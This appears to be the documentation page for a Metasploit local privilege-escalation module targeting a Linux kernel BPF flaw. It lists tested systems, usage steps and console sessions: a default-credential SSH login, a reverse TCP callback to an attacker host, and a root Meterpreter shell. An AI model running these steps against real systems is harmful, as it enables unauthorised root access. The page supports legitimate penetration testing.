## Vulnerable Application

  Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
  which contains a vulnerability where it may improperly perform sign
  extension. This can be utilized to escalate privileges.

  The target system must be compiled with BPF support and must not have
  `kernel.unprivileged_bpf_disabled` set to `1`.

  This module has been tested successfully on:

  * Debian 9.0 kernel 4.9.0-3-amd64;
  * Deepin 15.5 kernel 4.9.0-deepin13-amd64;
  * ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
  * Fedora 25 kernel 4.8.6-300.fc25.x86_64;
  * Fedora 26 kernel 4.11.8-300.fc26.x86_64;
  * Fedora 27 kernel 4.13.9-300.fc27.x86_64;
  * Gentoo 2.2 kernel 4.5.2-aufs-r1;
  * Linux Mint 17.3 kernel 4.4.0-89-generic;
  * Linux Mint 18.0 kernel 4.8.0-58-generic;
  * Linux Mint 18.3 kernel 4.13.0-16-generic;
  * Mageia 6 kernel 4.9.35-desktop-1.mga6;
  * Manjero 16.10 kernel 4.4.28-2-MANJARO;
  * Solus 3 kernel 4.12.7-11.current;
  * Ubuntu 14.04.1 kernel 4.4.0-89-generic;
  * Ubuntu 16.04.2 kernel 4.8.0-45-generic;
  * Ubuntu 16.04.3 kernel 4.10.0-28-generic;
  * Ubuntu 16.04.5 kernel 4.4.0-116-generic;
  * Ubuntu 17.04 kernel 4.10.0-19-generic;
  * ZorinOS 12.1 kernel 4.8.0-39-generic.

## Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: `use exploit/linux/local/bpf_sign_extension_priv_esc`
  4. Do: `set session #`
  5. Do: `set verbose true`
  6. Do: `exploit`

## Options

  **WritableDir**

  A folder we can write files to.  Defaults to `/tmp`

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`

## Scenarios

### Ubuntu 16.04 (with Linux 4.4.0-116-generic)

#### Initial Access

  ```
  resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
  resource (ubuntu.rb)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (ubuntu.rb)> set username ubuntu
  username => ubuntu
  resource (ubuntu.rb)> set password ubuntu
  password => ubuntu
  resource (ubuntu.rb)> exploit
  [+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
  [*] Command shell session 1 opened (1.1.1.1:36273 -> 2.2.2.2:22) at 2018-03-23 20:42:04 -0400
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  ```

#### Escalate

In this scenario, gcc is installed so we can live compile on the system.

  ```
  resource (ubuntu.rb)> use exploit/linux/local/bpf_sign_extension_priv_esc
  resource (ubuntu.rb)> set verbose true
  verbose => true
  resource (ubuntu.rb)> set session 1
  session => 1
  resource (ubuntu.rb)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (ubuntu.rb)> exploit
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [+] Kernel confirmed vulnerable
  [+] gcc is installed
  [*] Live compiling exploit on system
  [*] Writing files to target
  [*] Writing vQIIRofN to /tmp/vQIIRofN.c
  [*] Max line length is 65537
  [*] Writing 7797 bytes in 1 chunks of 26837 bytes (octal-encoded), using printf
  [*] Writing iuRJiXBf to /tmp/iuRJiXBf
  [*] Max line length is 65537
  [*] Writing 283 bytes in 1 chunks of 844 bytes (octal-encoded), using printf
  [*] Starting execution of priv esc.
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (812100 bytes) to 2.2.2.2
  [*] task_struct = ffff88003869aa00
  [*] uidptr = ffff8800354fb244
  [*] spawning root shell
  [*] Sleeping before handling stage...
  [+] Deleted /tmp/vQIIRofN.c
  [+] Deleted /tmp/vQIIRofN
  [+] Deleted /tmp/iuRJiXBf
  
  meterpreter > sysinfo
  Computer     : 2.2.2.2
  OS           : Ubuntu 16.04 (Linux 4.4.0-116-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  ```

#### Escalate w/ pre-compiled binaries

It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system.

  ```
  resource (ubuntu.rb)> use exploit/linux/local/bpf_sign_extension_priv_esc
  resource (ubuntu.rb)> set verbose true
  verbose => true
  resource (ubuntu.rb)> set session 1
  session => 1
  resource (ubuntu.rb)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (ubuntu.rb)> exploit
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [+] Kernel confirmed vulnerable
  [-] gcc is not installed.  Compiling will fail.
  [*] Dropping pre-compiled exploit on system
  [*] Writing vsQTwocG to /tmp/vsQTwocG
  [*] Max line length is 65537
  [*] Writing 14040 bytes in 1 chunks of 36802 bytes (octal-encoded), using printf
  [*] Writing JDQDHtEG to /tmp/JDQDHtEG
  [*] Max line length is 65537
  [*] Writing 283 bytes in 1 chunks of 844 bytes (octal-encoded), using printf
  [*] Starting execution of priv esc.
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (812100 bytes) to 2.2.2.2
  [*] task_struct = ffff88003a8a3800
  [*] uidptr = ffff88003d276304
  [*] spawning root shell
  [*] Sleeping before handling stage...
  [+] Deleted /tmp/vsQTwocG
  [+] Deleted /tmp/JDQDHtEG
  
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 2.2.2.2
  OS           : Ubuntu 16.04 (Linux 4.4.0-116-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```

### Debian 9.0 (x86_64)

  ```
  msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc 
  msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False
  compile => False
  msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ...
  [*] Writing '/tmp/.1pZhL1gc' (207 bytes) ...
  [*] Launching exploit ...
  [*] Sending stage (861480 bytes) to 172.16.191.236
  [*] Cleaning up /tmp/.1pZhL1gc and /tmp/.JBJBxoEO ...

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-9-0-x64.local
  OS           : Debian 9.4 (Linux 4.9.0-3-amd64)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```
